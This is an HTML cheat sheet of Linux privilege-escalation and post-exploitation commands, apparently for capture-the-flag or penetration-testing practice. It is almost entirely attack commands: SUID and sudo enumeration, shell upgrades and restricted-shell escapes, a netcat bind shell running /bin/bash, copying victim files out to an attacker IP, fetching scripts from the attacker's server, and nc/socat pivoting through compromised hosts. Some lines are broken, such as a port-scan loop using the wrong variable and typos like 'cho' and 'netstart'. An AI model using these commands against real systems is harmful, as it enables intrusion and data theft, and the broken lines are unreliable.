<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Cheatsheet</title>
</head><body><span style="font-family: menlo"><span style="font-size: 10pt">sudo -l &nbsp; </span><span style="font-size: 16pt">&nbsp; </span></span>&nbsp;--&gt; Check for root priv directories and applications <br/>
sudo bash &nbsp;--&gt; Get Root Shell <br/>
sudo id &nbsp; &nbsp; &nbsp; --&gt; Check Privilege level<br/>
<b><span style="font-family: trebuchet ms"><span style="color: #444444"><br/>
</span></span></b><span style="color: #444444"><b><span style="font-family: trebuchet ms">Operating System Details</span></b><span style="font-family: trebuchet ms">&nbsp;</span><span style="font-size: 14pt">&nbsp;<br/>
</span></span><span style="font-size: 14pt"><span style="color: #444444">uname -a &nbsp;</span>&nbsp;<br/>
<span style="color: #333333">cat /proc/version<br/>
</span></span><br/>
<span style="color: #333333">ps aux | grep root </span>&nbsp;--&gt; check for Applications running with root &nbsp;<br/>
<span style="color: #444444">ps -ef<br/>
</span><span style="color: #444444">dpkg -l --&gt; list all available packages.</span><br/>
python -c 'import pty;pty.spawn("/bin/bash")' &nbsp;<span style="color: #38761d">--&gt; spwan a python shell; sometimes python3 works as well<br/>
</span><span style="color: #38761d"><br/>
</span><span style="font-family: helvetica neue"><span style="color: #444444"><b><u>Get Interactive She</u></b></span></span><br/>
python -c 'import pty;pty.spawn("/bin/bash")'<br/>
ctrl +Z <br/>
stty raw -echo<br/>
fg<br/>
export TERM=xterm <br/>
<br/>
<span style="font-size: 14pt">Finding Files with Root Privileges: </span><br/>
<br/>
find / -perm -4000 2&gt;/dev/null | xargs ls -la<br/>
<br/>
<span style="font-size: 14pt">Finding World Readable Files:</span><br/>
<br/>
find / -perm -2 ! -type l -ls 2&gt;/dev/null<br/>
<br/>
<span style="font-size: 14pt">World Writable &amp; Executable files</span><br/>
find / \( -perm -o w -perm -o x \) -type d 2&gt;/dev/null<br/>
<br/>
<span style="font-size: 14pt">World Executable Folders:</span><br/>
find / -perm -o x -type d 2&gt;/dev/null<br/>
<br/>
<span style="font-size: 16pt">Find SUID &amp; SGID &nbsp;Binaries:</span><br/>
<br/>
find / -perm -g=s -o -perm -u=s -type f 2&gt;/dev/null &nbsp; &nbsp;# SGID or SUID<br/>
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2&gt;/dev/null; done <br/>
<br/>
find / -perm -1000 -type d 2&gt;/dev/null &nbsp; &nbsp; #Only the owner of the directory or the owner of a file can delete or rename here.<br/>
<br/>
find / -perm -g=s -type f 2&gt;/dev/null &nbsp; &nbsp; &nbsp;#SGID (chmod 2000) - run as the group, not the user who started it.<br/>
<br/>
find / -perm -u=s -type f 2&gt;/dev/null &nbsp; &nbsp; &nbsp;#SUID (chmod 4000) - run as the owner, not the user who started it.<br/>
<br/>
<span style="font-size: 16pt">List the Capabilities of files &nbsp;which has Root Privileges</span><br/>
<br/>
getcap -r / 2&gt;/dev/null <br/>
<br/>
Find Services Running Behind Firewall/Localhost <br/>
<br/>
netstat -ano<br/>
<br/>
netstat -tulpn<br/>
<br/>
<span style="font-size: 16pt">CRON Jobs </span><br/>
<br/>
crontab -l<br/>
ls -alh /var/spool/cron<br/>
ls -al /etc/ | grep cron<br/>
ls -al /etc/cron*<br/>
cat /etc/cron*<br/>
cat /etc/at.allow<br/>
cat /etc/at.deny<br/>
cat /etc/cron.allow<br/>
cat /etc/cron.deny<br/>
cat /etc/crontab<br/>
cat /etc/anacrontab<br/>
cat /var/spool/cron/crontabs/root <br/>
<br/>
find . -type f -ls &nbsp; &nbsp; &nbsp; &nbsp; --&gt; /Find files in all directories <br/>
<br/>
<br/>
<span style="font-size: 14pt">Send a File From Kali To Victim</span><br/>
<br/>
nc -nlvp 9001 &lt; exploit.c &nbsp;--&gt; Transfer files from Kali <br/>
<br/>
nc YourIpAddress 8001 &gt; /tmp/exploit.c &nbsp;--&gt; Get the file On Target Machine<br/>
<ul><li style="list-style-type: none"><ul><li style="list-style-type: none"><ul><li style="list-style-type: none">or</li>
<li style="list-style-type: none"></li>
</ul>
</li>
</ul>
</li>
</ul>
python -m SimpleHTTPServer 8080 &nbsp;--&gt; Start a communication server on your system<br/>
<br/>
wget http://yourip/LinuxEnum.sh &nbsp;--&gt; Run this in target machine to get this file<br/>
<br/>
<span style="font-size: 14pt">Get a File From Victim to Kali</span><br/>
<br/>
<span style="font-size: 12pt">on Kali: </span>nc -l -p 8001 &gt; filefoldername<br/>
<br/>
<span style="font-size: 12pt">on victim: </span>nc -w 5 10.10.14.14 8001 &lt; /usr/local/bin/filename <br/>
<br/>
<span style="font-size: 14pt">When anything can only be run as a specific user:</span><br/>
<br/>
sudo -u UserName /bin/bash &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; /works when you see this in sudo -l &nbsp; &nbsp; &nbsp;<br/>
<br/>
<span style="font-size: 12pt">Port Scanning with NMAP:</span><br/>
<br/>
for ip in $(seq 1 65535); do nc -nvzw1 VICTIM_IP $p 2&gt;&amp;1; done | grep open<br/>
<br/>
<span style="font-size: 13pt">Dynamic Port Forwarding </span><br/>
<br/>
nano /etc/proxychains.conf<br/>
<br/>
#add the below line <br/>
socks5 127.0.0.1 1080 <br/>
<br/>
<span style="font-size: 15pt">On Terminal:</span><br/>
<br/>
ssh -D 1080 root@10.10.10.10 &nbsp; &nbsp; &nbsp; /Need Password<br/>
<br/>
proxychains netdiscover -r 10.10.10.10/24<br/>
<br/>
<span style="font-size: 14pt">Local Port Forwarding using ssh </span><br/>
<br/>
ssh -L 1080:127.0.0.1:80 root@10.10.10.10<br/>
<br/>
<span style="font-size: 14pt">Remote Port Forwarding using SSH </span><br/>
<br/>
ssh -R 1080:127.0.0.1:80 root@10.10.10.10<br/>
<br/>
<span style="font-size: 16pt">Port Forwarding using Netcat</span><br/>
<br/>
nc -l -p $localport -c "nc $remotehost $remoteport"<br/>
<br/>
netcat -nvlp 9001 &nbsp; &nbsp; &nbsp; /Listen on port 9001<br/>
<br/>
netcat -l -p 9001 -e /bin/bash &nbsp;/Create a bash shell on port 9001<br/>
<br/>
netcat -L KALI_IP:80 -p 8902 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/Forward local port 9002 to remote port 80<br/>
<br/>
netcat -L kali_IP:80 -p 9002 -x &nbsp; &nbsp; &nbsp; &nbsp;/Port Forward Hex dump<br/>
<br/>
Port Forwarding using mknod <br/>
<br/>
mknod can be used to make files,directories and FIFO's(Named Pipe)<br/>
<br/>
mknod backpipe p / p = create a named pipe<br/>
<br/>
nc -l -p Allowed_Inbound_port 0&lt;backpipe | nc 127.0.0.1 22 1&gt;backpipe<br/>
&nbsp; <br/>
&nbsp;1 = Standard Output<br/>
&nbsp;0 = Standard Input<br/>
<br/>
<span style="font-size: 16pt">Netcat Relay to Forward SSH on our linux machine with Scenario</span><br/>
<br/>
you are on a windows box, trying to connect to a linux machine whose SSH-22 port inbound traffic is blocked. <br/>
we have a shell on linux machine but not ssh -so trying to get into ssh <br/>
<br/>
so, find some port which is open on Linux machine, and use nc to communicate, ex:4444<br/>
<br/>
on Linux Machine:<br/>
<br/>
We need to transfer traffic from port 22 to 4444 and access it on windows machine.<br/>
<br/>
mknod /tmp/backpipe p<br/>
nc -l -p 4444 0&lt;/tmp/backpipe | nc localhost 22 1&gt;/tmp/backpipe<br/>
&nbsp;<br/>
<br/>
<span style="font-size: 16pt">Port Forwarding using SoCat:</span><br/>
<br/>
Start a socat listener on Victim_macine2 - Port 8009 &amp; 8080, and listen it on First compromisted machine.<br/>
<br/>
From Victim-1 machine: do a port scan as above and port forrward the required ports<br/>
/Binding the VICTIM-2 ports to Victim-1 Machine so,that we can access it from our Kali machine<br/>
<br/>
socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 &amp; &nbsp;<br/>
socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 &amp; <br/>
<br/>
netstart -plunt &nbsp; &nbsp;/View the binded ports, we can see 8009 &amp; 8080 in Victim_machine1<br/>
<br/>
<br/>
<span style="font-size: 16pt">Access the Victim-2 Ports on our Kali Machine:on Victim-1 Machine: </span><br/>
<br/>
socat tcp-listen:4321,fork tcp:KALI_IP:4321 &amp; <br/>
<br/>
Compiling Exploit <br/>
<br/>
gcc exploit.c -pthread -lcrypt -o Exploit &nbsp;--&gt; Compile The Exploit<br/>
<br/>
gcc -m32 -Wl,--hash-style=both 9542.c -o exploit &nbsp;--&gt; Compiling 32-bit Exploit<br/>
<br/>
./Exploit<br/>
<br/>
<span style="font-size: 15pt">Check for Unmounted Drives</span><br/>
<br/>
cat etc/fstab <br/>
<br/>
cat .bash_history &nbsp; --&gt; &nbsp;Check the Commands History<br/>
<br/>
cho os.system("/bin/bash") &nbsp; &nbsp; &nbsp; --&gt; Escaping Limited Shell using ssh &nbsp; &nbsp; &nbsp; <br/>
<br/>
df -h &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;--&gt; Get List of Machine Partitions (Mounted Devices as well) <br/>
<br/>
/dev/shm &nbsp; &nbsp; &nbsp;--&gt; can copy any files into this location and run without permissions<br/>
<br/>
cat /dev/sdb &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; --&gt; Might contain deleted data in the partition<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;can try strings /dev/sdb for flags<br/>
<br/>
find / -perm -4000 -user root -exec ls -ld {} \; 2&gt;/dev/null<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; --&gt; all files and dir with root access <br/>
<br/>
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh <br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; --&gt; get a proper shell from a restricted shell<br/>
<br/>
mysql -u root -p &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; // logging as a root in mysql <br/>
<br/>
\! ls -l &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //Execute Commands <br/>
<br/>
<span style="font-size: 16pt">Finding Passwords from a PCAP file using TCPDUMP:</span><br/>
<br/>
tcpdump -nt -r capture.pcap -A 2&gt;/dev/null | grep -P 'pwd='<br/>
&nbsp;<br/>
<br/>
<br/>
</body></html>